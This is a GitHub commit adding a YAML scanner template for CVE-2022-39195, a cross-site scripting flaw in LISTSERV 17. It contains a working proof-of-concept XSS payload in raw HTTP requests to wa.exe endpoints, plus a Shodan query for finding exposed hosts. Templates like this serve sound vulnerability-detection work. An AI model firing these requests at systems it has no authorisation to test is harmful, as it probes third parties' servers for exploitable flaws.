Create CVE-2022-39195.yaml

patch-1
Cryptoc0nman 2023-01-22 23:20:06 +05:30 committed by GitHub
parent 3f4ddea4e2
commit 04f20f87c5
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 35 additions and 0 deletions

View File

@ -0,0 +1,35 @@
id: CVE-2022-39195
info:
name: LISTSERV v17 - Cross Site Scripting
author: arafatansari
severity: medium
description: |
LISTSERV version 17 suffers from a cross site scripting vulnerability
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-39195
- https://packetstormsecurity.com/files/170552/LISTSERV-17-Cross-Site-Scripting.html
metadata:
shodan-query: http.html:"LISTSERV"
verified: "true"
tags: xss,cve,2022
requests:
- raw:
- |
GET /scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1
Host: {{Hostname}}
- |
GET /scripts/wa-HAP.exe?TICKET=test&c=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<script>alert(1)</script>"